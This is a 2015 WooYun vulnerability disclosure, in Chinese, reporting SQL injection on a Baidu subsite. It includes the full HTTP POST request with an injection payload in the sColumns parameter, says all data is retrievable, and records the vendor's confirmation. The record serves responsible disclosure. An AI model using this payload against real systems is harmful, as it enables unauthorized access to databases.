当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104032

漏洞标题:百度某子站SQL注入

相关厂商:百度

漏洞作者: Jannock

提交时间:2015-03-26 21:51

修复时间:2015-05-11 12:02

公开时间:2015-05-11 12:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向核心白帽子及相关领域专家公开
2015-04-16: 细节向普通白帽子公开
2015-04-26: 细节向实习白帽子公开
2015-05-11: 细节向公众公开

简要描述:

百度某子站SQL注入

详细说明:

POST /statistics/detail HTTP/1.1
Host: baitong.baidu.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://baitong.baidu.com/statistics/index
Content-Length: 351
Cookie: cookie
Pragma: no-cache
Cache-Control: no-cache
Connection: Keep-Alive
sEcho=3&iColumns=3&sColumns=app_name%2Cdownload_num%2C(1-(case when(1=2) then 1 else (select 1 union select 2) end))&iDisplayStart=0&iDisplayLength=10&mDataProp_0=app_name&mDataProp_1=download_num&mDataProp_2=money_num&iSortingCols=1&iSortCol_0=2&sSortDir_0=desc&bSortable_0=false&bSortable_1=true&bSortable_2=true&id=0&begin=2015-03-19&end=2015-03-25


注入点不能用 , 号,绕过方式就不说了。可以获取所有数据。

漏洞证明:

1.png


2.png


3.png


database() baitong

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-27 12:01

厂商回复:

感谢提交,已通知业务部门处理

最新状态:

暂无